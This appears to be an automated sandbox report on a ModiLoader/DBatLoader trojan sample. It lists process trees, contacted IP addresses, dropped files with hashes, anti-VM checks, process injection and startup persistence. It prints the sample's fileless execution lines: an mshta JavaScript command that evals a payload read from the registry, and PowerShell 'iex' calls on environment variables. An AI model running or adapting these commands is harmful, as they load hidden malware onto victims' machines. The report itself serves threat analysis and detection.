"C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cbfo

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 48.169.141.22:8080 tcp
KR 165.246.247.140:80 tcp
MA 196.83.255.242:80 tcp
CH 81.221.77.40:80 tcp
TH 27.145.168.85:443 tcp
US 12.44.176.128:80 tcp
RU 188.32.166.42:8080 tcp
SE 84.216.74.198:8080 tcp
MX 189.243.201.44:80 tcp
ES 147.96.228.185:80 tcp
DE 85.16.22.120:80 tcp
FR 213.223.111.203:80 tcp
US 131.201.65.7:80 tcp
NL 195.73.87.125:80 tcp
CA 153.71.63.204:80 tcp
GB 92.232.9.128:80 tcp
CA 207.61.240.252:80 tcp
US 17.9.45.48:80 tcp
US 35.148.212.161:80 tcp
DK 82.211.221.66:80 tcp
BR 179.100.237.195:8080 tcp
CN 113.6.94.140:8080 tcp
US 32.31.93.37:80 tcp
NL 217.12.208.12:80 217.12.208.12 tcp
DE 91.249.8.30:80 tcp
US 69.48.11.103:80 tcp
US 22.149.89.189:80 tcp
SG 4.194.169.202:80 tcp
CN 175.94.211.97:443 tcp
JP 133.57.80.53:80 tcp
US 170.6.4.5:80 tcp
CN 218.16.30.202:80 tcp
JP 165.242.208.184:8080 tcp
JP 61.210.213.107:80 tcp
IT 176.206.180.60:80 tcp
JP 111.65.193.192:80 tcp
DE 51.121.29.43:80 tcp
GB 185.118.127.66:80 tcp
US 11.30.52.195:80 tcp
ZM 45.215.198.138:80 tcp
US 168.175.213.159:80 tcp
GB 158.230.210.36:80 tcp
US 135.199.212.200:80 tcp
CO 191.149.8.119:80 tcp
JP 126.142.255.138:80 tcp
LU 158.167.89.124:80 tcp
GB 25.224.84.108:80 tcp
US 34.68.185.174:80 tcp
US 164.223.42.38:80 tcp
TW 163.32.130.211:80 tcp
US 184.185.80.116:80 tcp
GB 62.136.34.227:80 tcp
US 155.35.170.109:443 tcp
NL 161.87.225.12:80 tcp
PL 79.191.75.134:80 tcp
US 29.154.141.94:443 tcp
US 134.168.232.111:80 tcp
US 17.2.236.95:80 tcp
US 24.169.162.55:80 tcp
CA 142.246.145.150:8080 tcp
US 28.170.176.70:80 tcp
US 54.235.104.236:80 tcp
US 54.235.104.236:80 54.235.104.236 tcp
IT 88.46.87.124:80 tcp
RU 31.130.85.46:80 tcp
NL 145.132.137.210:80 tcp
RU 80.242.59.198:80 tcp
NL 217.12.208.12:80 217.12.208.12 tcp
US 4.153.91.67:80 tcp
US 70.105.108.29:80 tcp
JP 61.214.197.50:80 tcp
US 28.225.25.44:80 tcp
DE 217.11.58.97:80 tcp
US 7.228.42.175:80 tcp
US 135.177.180.132:80 tcp
US 57.162.224.185:80 tcp
NO 2.148.41.150:80 tcp
US 138.193.231.200:80 tcp
NZ 49.227.114.3:80 tcp
CO 200.29.126.180:80 tcp
MY 175.137.203.245:80 tcp
CN 124.251.96.198:80 tcp
CH 163.161.105.125:80 tcp
DE 51.131.50.220:80 tcp
AU 175.38.155.122:80 tcp
US 192.18.37.3:80 tcp
US 52.32.132.68:443 tcp
IT 37.116.111.130:8080 tcp
US 18.76.190.185:80 tcp
DE 87.168.149.84:80 tcp
US 216.204.230.229:80 tcp
CN 110.208.188.5:80 tcp
US 214.166.90.160:80 tcp
BR 177.29.215.184:80 tcp
US 47.196.215.79:80 tcp
FR 109.223.53.181:80 tcp
US 138.57.50.148:80 tcp
CN 120.38.237.202:80 tcp
ZA 146.230.212.38:80 tcp
AU 165.18.121.151:80 tcp
CN 218.80.98.247:80 tcp
JP 126.242.64.136:80 tcp
US 99.175.61.120:80 tcp
US 107.64.9.230:80 tcp
RE 109.122.163.93:80 tcp
US 44.77.197.138:80 tcp
CN 106.239.232.160:80 tcp
NO 153.110.66.137:80 tcp
RU 212.48.51.106:80 tcp
US 75.66.50.106:80 tcp
NL 217.12.208.12:80 217.12.208.12 tcp
CN 180.112.39.142:8080 tcp
US 215.177.254.117:80 tcp
AR 181.82.96.121:80 tcp
SE 78.67.94.111:8080 tcp
US 135.178.38.144:80 tcp
US 26.149.214.191:80 tcp
US 140.64.7.217:80 tcp
US 140.197.125.242:80 tcp
US 104.38.141.187:80 tcp
JP 133.152.63.244:80 tcp
NL 104.83.201.181:8080 tcp
GB 51.9.117.104:80 tcp
CH 195.65.23.181:80 tcp
US 70.228.39.17:443 tcp
JP 113.34.174.60:80 tcp
US 7.64.209.103:80 tcp
NL 81.206.39.168:80 tcp
US 143.25.40.224:80 tcp
US 17.148.108.113:80 tcp
US 107.22.93.94:80 tcp
DE 89.13.8.151:80 tcp
US 171.143.222.192:80 tcp
US 147.191.22.187:8080 tcp
US 26.116.127.27:80 tcp
SG 43.86.150.39:80 tcp
CN 103.165.52.201:80 tcp
US 139.56.191.199:80 tcp
KE 196.102.62.48:80 tcp
TW 140.135.2.226:80 tcp
US 44.236.199.194:80 tcp
DE 91.46.107.44:80 tcp
US 33.242.153.162:80 tcp
US 99.123.228.82:8080 tcp
US 71.44.88.138:80 tcp
US 50.178.213.159:8080 tcp
FR 54.38.71.155:80 tcp
US 76.253.221.145:8080 tcp
IT 188.152.155.149:80 tcp
CA 50.69.193.218:80 tcp
CO 161.18.163.5:80 tcp

Files

memory/2864-2-0x0000000000400000-0x000000000043F000-memory.dmp

memory/2864-4-0x0000000000400000-0x000000000043F000-memory.dmp

\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

MD5 29d53275576b5ded03ed2a1e5dc1f0cf
SHA1 754da96a93a901bd9a2885b438b11989f020621b
SHA256 2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a
SHA512 11d35cf5d0589c589a7ac7ebf8cd44d03ce5a8a6ea078b5b5c0e083dcfdce22bc6d3d2a01a304cfbcec512ec0e9d5178dc1beb6241078de4f3b002a33979a27e

memory/2864-14-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-16-0x0000000000400000-0x000000000043F000-memory.dmp

memory/2864-17-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-19-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-18-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-20-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-21-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2864-22-0x0000000000320000-0x00000000003F6000-memory.dmp

memory/2624-41-0x0000000006340000-0x0000000006416000-memory.dmp

memory/1080-42-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-44-0x0000000000200000-0x0000000000341000-memory.dmp

memory/2624-45-0x0000000006340000-0x0000000006416000-memory.dmp

memory/1080-51-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-52-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-50-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-54-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-56-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-57-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-53-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-46-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-59-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-47-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-48-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-84-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-49-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-67-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-68-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-77-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-76-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-75-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-74-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-73-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-85-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-66-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-65-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-62-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-64-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-63-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-61-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-60-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-58-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1080-55-0x0000000000200000-0x0000000000341000-memory.dmp

memory/1584-98-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-99-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-97-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-95-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-100-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-96-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-94-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-93-0x0000000000110000-0x0000000000251000-memory.dmp

memory/1584-92-0x0000000000110000-0x0000000000251000-memory.dmp

C:\Users\Admin\AppData\Local\416844\7efaba.bat

MD5 a9d3ea542d72c3d4eb6e79b37f9b265e
SHA1 9ef048c6a4cc72891fe4b6d8c3ae59e134711cb9
SHA256 d287a2bcc9c2485a60329a6bb94fb260bec57524e3098a5bd7c7cedf3e460314
SHA512 eba879b158972749be9a48b1ff0d7393f69960da48c1f8e92c3886d9cf16ae437ac5eea449f59de788cbf5b9033ebc78311f2b591f6d41631521a3f0ea24208b

C:\Users\Admin\AppData\Roaming\730a4b\791dbf.983f33d

MD5 aa37b7596ed13ac91b87344631bce5b8
SHA1 0f873444ac01f923e70f7bef5a9b0b302787cc9d
SHA256 eb216409d0231346cc0b05114e632d4f8a0dfb9857a455d4f85cdf2f8e2aa863
SHA512 c545701e2c938174a35bc423b6053618dc11f38929a262d714717c59d52bf0cb09179fe5fa36b44c43192aaf7eb071cc57ef60b4a4731ca7377b0a4932862022

C:\Users\Admin\AppData\Local\416844\eecdc5.lnk

MD5 dc7d7d400a2ef3f6bd26b5b59752dc65
SHA1 24024493823a5eddce9744e2c0d7a1c08883ad58
SHA256 ddda6e501616a1507124ac030f156ba4d2701400dba1f526034dc94dbd8fc16b
SHA512 f08cb194d3a8fc48e79e0f2ee0aa02902ebc08ded5531bf4656baa88b2bbba0e908a59dd830c1d625eeb542a30d7d199b83b22ca9d212ecf4d45cda4b1d0aab1

C:\Users\Admin\AppData\Local\416844\1a6bc1.983f33d

MD5 3725ca4cdcca4e5760a4322f0891770e
SHA1 5676e4505dca24e502e0ca19d0860e8ee5df32bd
SHA256 f012b4205cf478530338ef27db54196c52cc2773a66517382988e6bc651b2322
SHA512 a2370ffc00077fc890cdc41120fbc633eb321386b763b695e81bf89f364238104bd28dd47c441c9963b3123790f517fc8854b9bf87c554c59ae19ccafdb4eb30

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnk

MD5 fecb855b47f9a96231ba51789b61f929
SHA1 44f9d8498b33569cac0a0a939c3dc636564cea06
SHA256 9a45685f97f6534d880ced46ede455e8ef78877ab1bbef76986335309eddd3c7
SHA512 94307f8bb949464855a8a7088a4f3f1d70232006f2dc57f85567963a9253056b589de203fb5244ef8de53a8122dcdcc61c5533b7ec85b33805b9339cebd09bff

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-09 11:49

Reported

2024-05-09 11:52

Platform

win10v2004-20240508-en

Max time kernel

142s

Max time network

133s

Command Line

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMWare, Inc.\VMWare Tools C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMWare, Inc.\VMWare Tools C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3944 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3944 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3944 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 5108 wrote to memory of 1740 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5108 wrote to memory of 1740 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5108 wrote to memory of 1740 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:rp80bcfjF="0ctu8uK";Ca90=new%20ActiveXObject("WScript.Shell");Lmo5m="L";hb78ec=Ca90.RegRead("HKLM\\software\\Wow6432Node\\M69god\\kLdp1LW6CD");Vn8mOtRM="qOcQoL";eval(hb78ec);NOM1fM="3S";

C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ndyezgwx

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4324,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=1328 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
NL 217.12.208.12:80 217.12.208.12 tcp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 12.208.12.217.in-addr.arpa udp
US 8.8.8.8:53 45.56.20.217.in-addr.arpa udp
NL 217.12.208.12:80 217.12.208.12 tcp
NL 217.12.208.12:80 217.12.208.12 tcp
US 8.8.8.8:53 24.242.123.52.in-addr.arpa udp

Files

memory/3944-2-0x0000000000400000-0x000000000043F000-memory.dmp

memory/3944-5-0x0000000000400000-0x000000000043F000-memory.dmp

C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

MD5 29d53275576b5ded03ed2a1e5dc1f0cf
SHA1 754da96a93a901bd9a2885b438b11989f020621b
SHA256 2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a
SHA512 11d35cf5d0589c589a7ac7ebf8cd44d03ce5a8a6ea078b5b5c0e083dcfdce22bc6d3d2a01a304cfbcec512ec0e9d5178dc1beb6241078de4f3b002a33979a27e

memory/3944-10-0x0000000000C80000-0x0000000000D56000-memory.dmp

memory/3944-13-0x0000000000400000-0x000000000043F000-memory.dmp

memory/3944-17-0x0000000000C80000-0x0000000000D56000-memory.dmp

memory/3944-16-0x0000000000C80000-0x0000000000D56000-memory.dmp

memory/3944-14-0x0000000000C80000-0x0000000000D56000-memory.dmp

memory/3944-15-0x0000000000C80000-0x0000000000D56000-memory.dmp

memory/3944-18-0x0000000000C80000-0x0000000000D56000-memory.dmp

memory/3944-19-0x0000000000C80000-0x0000000000D56000-memory.dmp

memory/1740-25-0x00000000052C0000-0x00000000052F6000-memory.dmp

memory/1740-26-0x0000000005A10000-0x0000000006038000-memory.dmp

memory/1740-27-0x00000000058E0000-0x0000000005902000-memory.dmp

memory/1740-29-0x0000000006120000-0x0000000006186000-memory.dmp

memory/1740-28-0x00000000060B0000-0x0000000006116000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_catjojr4.h5j.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1740-39-0x0000000006190000-0x00000000064E4000-memory.dmp

memory/1740-40-0x0000000006700000-0x000000000671E000-memory.dmp

memory/1740-41-0x00000000067A0000-0x00000000067EC000-memory.dmp

memory/1740-42-0x0000000007E20000-0x000000000849A000-memory.dmp

memory/1740-43-0x00000000077D0000-0x00000000077EA000-memory.dmp